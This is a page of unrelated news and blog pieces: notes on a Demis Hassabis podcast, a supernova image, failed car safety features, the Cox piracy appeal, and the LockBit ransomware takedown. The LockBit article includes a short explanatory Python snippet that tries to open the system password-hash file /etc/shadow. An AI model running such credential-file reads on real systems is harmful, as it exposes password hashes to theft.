  6. (31:30) Says Gemini 1.0 used about as much compute as ‘has been rumored for’ GPT-4. Google will have the most compute, they hope to make good use of that, and the things that scale best are what matter most.

  7. (35:30): What should governance for these systems look like? Demis says we all need to be involved in those decisions and reach consensus on what would be good for all, and this is why he emphasizes things that benefit everyone like AI for science. Easy to say, but needs specifics and actual plans.

  8. (37:30): Dwarkesh asks the good question, why haven’t LLMs automated things more than they have? Demis says for general use cases the capabilities are not there yet for things such as planning, search and long term memory for prior conversations. He mentions future recommendation systems, a pet cause of mine. I think he is underestimating that the future simply is not evenly distributed yet.

  9. (40:42) Demis says they are working on having a safety framework like those of OpenAI and Anthropic. Right now he says they have them implicitly on safety councils and so on that people like Shane chair, but they are going to be publicly talking about it this year. Excellent.

  10. (41:30): Dwarkesh asks about model weights security, Demis connects to open model weights right away. Demis says Google has very strong world-class protections already and DeepMind doubles down on that, says all frontier labs should take such precautions. Access is a tricky issue. For open weights, he’s all for it for things like AlphaFold or AlphaGo that can’t be misused (and those are indeed open sourced now) but his question is, for frontier models, how do we stop bad actors at all scales from misusing them if we share the weights? He doesn’t know the answer and hasn’t heard a clear one anywhere.

  11. (46:00) Asked what safety research will be DeepMind’s specialty, Demis first mentions them pioneering RLHF, which I would say has not been going well recently and definitely won’t scale. He then mentions self-play especially for boundary testing, we need automated testing, goes back to games. Not nothing, but seems like he should be able to do better.

  12. (47:00) Demis is excited by multimodal use cases for LLMs like Gemini, and also excited on the progress in robotics, they like that it is a data-poor regime because it forces them to do good research. Multimodality starts out harder, then makes things easier once things get going. He expects places where self-play works to see better progress than other domains, as you would expect.

  13. (52:00) Why build science AIs rather than wait for AGI? We can bring benefits to the world before AGI, and we don’t know how long AGI will take to arrive. Also real-world problems keep you honest, give you real world feedback.

  14. (54:30) Standard ‘things are going great’ for the merger with Google Brain, calls Gemini the first fruit of the collaboration, strongly implies the ‘twins’ that inspired the name Gemini are Google Brain and DeepMind.

  15. (57:20) Demis affirms ‘responsible scaling policies are something that is a very good empirical way to precommit to these kinds of things.’

  16. (58:00) Demis says if a model helped enable a bioweapon or something similar, they’d need to ‘fix that loophole,’ the important thing is to detect it in advance. I always worry about such talk, because of its emphasis on addressing specific failure modes that you foresee, rather than thinking about failures in general.

While interesting throughout, nothing here was inconsistent with what we know about Demis Hassabis or DeepMind. Demis, Shane and DeepMind are clearly very aware of the problems that lie ahead of them, are motivated to solve them, and unfortunately are still unable to express detailed plans that seem hopeful for actually doing that. Demis seemed much more aware of this confusion than Shane did, which is hopeful. Games are still central to what Demis thinks about and plans for AI.

The best concrete news is that DeepMind will be issuing its own safety framework in the coming months.

Notes on Dwarkesh Patel’s Podcast with Demis Hassabis Read More »

Daily Telescope: Finally, we’ve found the core of a famous supernova

A dense subject —

In the astronomy community, SN 1987A has somewhat legendary status.

Webb has observed the best evidence yet for emission from a neutron star at the site of Supernova 1987A.

Welcome to the Daily Telescope. There is a little too much darkness in this world and not enough light, a little too much pseudoscience and not enough science. We’ll let other publications offer you a daily horoscope. At Ars Technica, we’re going to take a different route, finding inspiration from very real images of a universe that is filled with stars and wonder.

Good morning. It’s February 26, and today’s image highlights the core of a (relatively) nearby supernova.

In the astronomy community, SN 1987A has somewhat legendary status. The first observable light from this exploding star in the Large Magellanic Cloud reached Earth in February, almost 37 years ago to the day. It was the first supernova that astronomers were able to observe and study with modern telescopes. It was still discussed in reverent terms a few years later when I was an undergraduate student studying astronomy at the University of Texas.

One of the enduring mysteries of the supernova is that astronomers have been unable to find its collapsed core, where they would expect to see a neutron star—an ultra-dense object that results from the supernova explosion of a massive star. In recent years, ground-based telescopes have found hints of this collapsed core, but now the James Webb Space Telescope has found emission lines that almost certainly must come from a newly born neutron star.

The astronomical details can be found here. It’s a nice validation of our understanding of supernovae.

I would also like to acknowledge that the Daily Telescope has been anything but “daily” of late. This is due to a confluence of several factors, including a lot of travel and work on other projects, including four features in the last month or so. I’ve had to put some things on the back-burner. I don’t want to stop producing these articles, but I also can’t commit to writing one every day. Maybe it should be renamed? For now, I’m just going to try to do my best. I appreciate those who have written to ask where the Daily Telescope has been—well, all of you but the person who wrote a nasty note.

Source: NASA, ESA, CSA, STScI, et al.

Do you want to submit a photo for the Daily Telescope? Reach out and say hello.

Daily Telescope: Finally, we’ve found the core of a famous supernova Read More »

It’s no accident: These automotive safety features flopped

safety first —

Over the years, inventors have had some weird ideas about how to make cars safer.

Turn signals have been a vehicle safety staple since they first appeared on Buicks in 1939. Of course, many drivers don’t use them, perhaps believing that other motorists can telepathically divine others’ intentions.

More people might use turn signals if they knew that drivers’ failure to do so leads to more than 2 million accidents annually, according to a study conducted by the Society of Automotive Engineers. That’s 2 percent of all crashes, according to the National Highway Traffic Safety Administration. And not using turn signals increases the likelihood of an accident by 40 percent, according to the University of Michigan Research Institute.

Human nature could be to blame—death and injury will never happen to us, only others.

You wish.

So, is it any wonder that during the first six decades of automobile production, there were few safety features? The world into which the automobile was born was one in which horses powered most transportation, but that didn’t mean getting around was safe. Say a horse got spooked. If the animal was pulling a carriage, its actions could cause the carriage to barrel away or even overturn, injuring or killing its occupants. Or the horse could cause death directly. In fact, a surprising number of kings met their end over the centuries by a horse’s swift kick. And rail travel proved even deadlier. Studies comparing modern traffic accidents with those of the early 20th century reveal that death from travel is 90 percent less likely today than it was in 1925.

Yet America’s passive acceptance of death from vehicle travel in the late 19th and early 20th century explains why auto safety was sporadically addressed, if at all. Sure, there were attempts at offering basic safety in early automobiles, like windshield wipers and improved lighting. And some safety features endured, such as Ford’s introduction of safety glass as standard equipment in 1927 or GM’s turn signals. But while other car safety features appeared from time to time, many of them just didn’t pan out.

Dead ends on the road to safer cars

Among the earliest attempts at providing safety was the O’Leary Fender, invented by John O’Leary of Cohoes, New York, in 1906. “It is made of bands of iron of such shape and design that falling into it is declared to be like the embrace of a summer girl on a moonlit night on the shore,” wrote The Buffalo News in 1919, with more than a little poetic license.

Advertisement for Pennsylvania Vacuum Cup Tires by the Pennsylvania Rubber Company in Jeannette, Pennsylvania. The Pennsylvania Auto Tube is pictured, 1919.

According to the account, O’Leary was so confident of the fender’s ability to save lives that he used his own child to prove its safety. “The babe was gathered up on the folds of the fender as tenderly as it had ever been in the arms of its mother,” the newspaper reported, “and was not only uninjured but seemed to enjoy the experience.”

There’s no word on what Mrs. O’Leary thought of using the couple’s child as a crash test dummy. But the invention seemed worthy enough that an unnamed car manufacturer battled O’Leary in court over it and lost. Ultimately, his victory proved futile, as the feature was not adopted.

Others also tried to bring some measure of safety to automobiles, chief among them the Pennsylvania Rubber Company of Jeannette, Pennsylvania. The company’s idea: make a tire tread of small suction cups to improve traction. Called the Pennsylvania Vacuum Cup tire, the product proved to be popular for a while, with reports of sales outnumbering conventional tires 10 to 1, according to the Salt Lake Tribune in 1919. While Pennsylvania wasn’t the only rubber company to offer vacuum cup tires, the concept had its day before fading, although the idea does resurface from time to time.

Nevertheless, safety remained unaddressed, even as the number of deaths was rising substantially.

“Last year more than 22,000 persons were killed in or by automobiles, and something like three quarters of a million injured,” wrote The New Republic in 1926. “The number of dead is almost half as large as the list of fatalities during the nineteen months of America’s participation in the Great War.”

“The 1925 total is 10 percent larger than that for 1924,” the publication added.

The chief causes cited were the same as they are today—namely, speeding, violating the rules of the road, inattention, inexperience, and confusion. But at least one automaker—Stutz—was trying to put safety first.

It’s no accident: These automotive safety features flopped Read More »

Court blocks $1 billion copyright ruling that punished ISP for its users’ piracy

A federal appeals court today overturned a $1 billion piracy verdict that a jury handed down against cable Internet service provider Cox Communications in 2019. Judges rejected Sony’s claim that Cox profited directly from copyright infringement committed by users of Cox’s cable broadband network.

Appeals court judges didn’t let Cox off the hook entirely, but they vacated the damages award and ordered a new damages trial, which will presumably result in a significantly smaller amount to be paid to Sony and other copyright holders. Universal and Warner are also plaintiffs in the case.

“We affirm the jury’s finding of willful contributory infringement,” said a unanimous decision by a three-judge panel at the US Court of Appeals for the 4th Circuit. “But we reverse the vicarious liability verdict and remand for a new trial on damages because Cox did not profit from its subscribers’ acts of infringement, a legal prerequisite for vicarious liability.”

If the correct legal standard had been used in the district court, “no reasonable jury could find that Cox received a direct financial benefit from its subscribers’ infringement of Plaintiffs’ copyrights,” judges wrote.

The case began when Sony and other music copyright holders sued Cox, claiming that it didn’t adequately fight piracy on its network and failed to terminate repeat infringers. A US District Court jury in the Eastern District of Virginia found the ISP liable for infringement of 10,017 copyrighted works.

Copyright owners want ISPs to disconnect users

Cox’s appeal was supported by advocacy groups concerned that the big-money judgment could force ISPs to disconnect more Internet users based merely on accusations of copyright infringement. Groups such as the Electronic Frontier Foundation also called the ruling legally flawed.

“When these music companies sued Cox Communications, an ISP, the court got the law wrong,” the EFF wrote in 2021. “It effectively decided that the only way for an ISP to avoid being liable for infringement by its users is to terminate a household or business’s account after a small number of accusations—perhaps only two. The court also allowed a damages formula that can lead to nearly unlimited damages, with no relationship to any actual harm suffered. If not overturned, this decision will lead to an untold number of people losing vital Internet access as ISPs start to cut off more and more customers to avoid massive damages.”

In today’s 4th Circuit ruling, appeals court judges wrote that “Sony failed, as a matter of law, to prove that Cox profits directly from its subscribers’ copyright infringement.”

A defendant may be vicariously liable for a third party’s copyright infringement if it profits directly from it and is in a position to supervise the infringer, the ruling said. Cox argued that it doesn’t profit directly from infringement because it receives the same monthly fee from subscribers whether they illegally download copyrighted files or not, the ruling noted.

The question in this type of case is whether there is a causal relationship between the infringement and the financial benefit. “If copyright infringement draws customers to the defendant’s service or incentivizes them to pay more for their service, that financial benefit may be profit from infringement. But in every case, the financial benefit to the defendant must flow directly from the third party’s acts of infringement to establish vicarious liability,” the court said.

Court blocks $1 billion copyright ruling that punished ISP for its users’ piracy Read More »

after-years-of-losing,-it’s-finally-feds’-turn-to-troll-ransomware-group

After years of losing, it’s finally feds’ turn to troll ransomware group

LOOK WHO’S TROLLING NOW —

Authorities who took down the ransomware group brag about their epic hack.

After years of losing, it’s finally feds’ turn to troll ransomware group

Getty Images

After years of being outmaneuvered by snarky ransomware criminals who tease and brag about each new victim they claim, international authorities finally got their chance to turn the tables, and they aren’t squandering it.

The top-notch trolling came after authorities from the US, UK, and Europol took down most of the infrastructure belonging to LockBit, a ransomware syndicate that has extorted more than $120 million from thousands of victims around the world. On Tuesday, most of the sites LockBit uses to shame its victims for being hacked, pressure them into paying, and brag about its hacking prowess began displaying content announcing the takedown. The seized infrastructure also hosted decryptors victims could use to recover their data.

The dark web site LockBit once used to name and shame victims, displaying entries such as “press releases,” “LB Backend Leaks,” and “LockbitSupp You’ve been banned from Lockbit 3.0.”

this_is_really_bad

Authorities didn’t use the seized name-and-shame site solely for informational purposes. One section that appeared prominently gloated over the extraordinary extent of the system access investigators gained. Several images indicated they had control of /etc/shadow, a Linux file that stores cryptographically hashed passwords. This file, among the most security-sensitive ones in Linux, can be accessed only by a user with root, the highest level of system privileges.

Screenshot showing a folder named “shadow” with hashes for accounts including “root,” “daemon,” “bin,” and “sys.”
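
To put that access in concrete terms, here is a minimal, hypothetical sketch (in Python, not taken from the investigation) of how an /etc/shadow entry is laid out per shadow(5) and why an unprivileged process cannot read the real file. The example entry and hash below are fabricated.

# Hypothetical illustration: the field layout of an /etc/shadow entry and the
# PermissionError a non-root process gets when it tries to read the real file.
entry = "root:$6$examplesalt$exampledigest:19700:0:99999:7:::"  # fabricated entry

fields = entry.split(":")
print("account:      ", fields[0])  # user name
print("password hash:", fields[1])  # "$6$" prefix indicates SHA-512 crypt
print("last change:  ", fields[2])  # days since the Unix epoch

try:
    with open("/etc/shadow") as f:  # typically mode 0640 or stricter, owned by root
        f.readline()
except PermissionError:
    print("Permission denied: only root can read /etc/shadow")

Run as an ordinary user, the final block prints the permission error; run as root, it reads the file’s first line, which is the level of access the seized screenshots implied.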

Other images demonstrated that investigators also had complete control of the main web panel and the system LockBit operators used to communicate with affiliates and victims.

Screenshot of a panel used to administer the LockBit site.

Screenshot showing chats between a LockBit affiliate and a victim.

The razzing didn’t stop there. The file names of the images included “this_is_really_bad.png,” “oh dear.png,” and “doesnt_look_good.png.” The seized page also teased the upcoming doxing of LockbitSupp, the moniker of the main LockBit figure. It read: “Who is LockbitSupp? The $10m question” and displayed images of cash wrapped in chains with padlocks. Copying a common practice of LockBit and competing ransomware groups, the seized site displayed a clock counting down the seconds until the identifying information would be posted.

Screenshot showing “who is lockbitsupp?”

In all, authorities said they seized control of 14,000 accounts and 34 servers located in the Netherlands, Germany, Finland, France, Switzerland, Australia, the US, and the UK. Two LockBit suspects have been arrested in Poland and Ukraine, and five indictments and three arrest warrants have been issued. Authorities also froze 200 cryptocurrency accounts linked to the ransomware operation.

“At present, a vast amount of data gathered throughout the investigation is now in the possession of law enforcement,” Europol officials said. “This data will be used to support ongoing international operational activities focused on targeting the leaders of this group, as well as developers, affiliates, infrastructure, and criminal assets linked to these criminal activities.”

LockBit has operated since at least 2019, initially under the name “ABCD.” Within three years, it was the most widely circulating ransomware. Like most of its peers, LockBit operates under what’s known as ransomware-as-a-service, in which it provides software and infrastructure to affiliates who use it to compromise victims. LockBit and the affiliates then divide any resulting revenue. Hundreds of affiliates have participated.

According to KrebsOnSecurity, one of the LockBit leaders said on a Russian-language crime forum that a vulnerability in the PHP scripting language provided the means for authorities to hack the servers. That detail led to another round of razzing, this time from fellow forum participants.

“Does it mean that the FBI provided a pen-testing service to the affiliate program?” one participant wrote, according to reporter Brian Krebs. “Or did they decide to take part in the bug bounty program? :):).”

Several members also posted memes taunting the group about the security failure.

“In January 2024, LockBitSupp told XSS forum members he was disappointed the FBI hadn’t offered a reward for his doxing and/or arrest, and that in response he was placing a bounty on his own head—offering $10 million to anyone who could discover his real name,” Krebs wrote. “‘My god, who needs me?’ LockBitSupp wrote on January 22, 2024. ‘There is not even a reward out for me on the FBI website.’”

After years of losing, it’s finally feds’ turn to troll ransomware group Read More »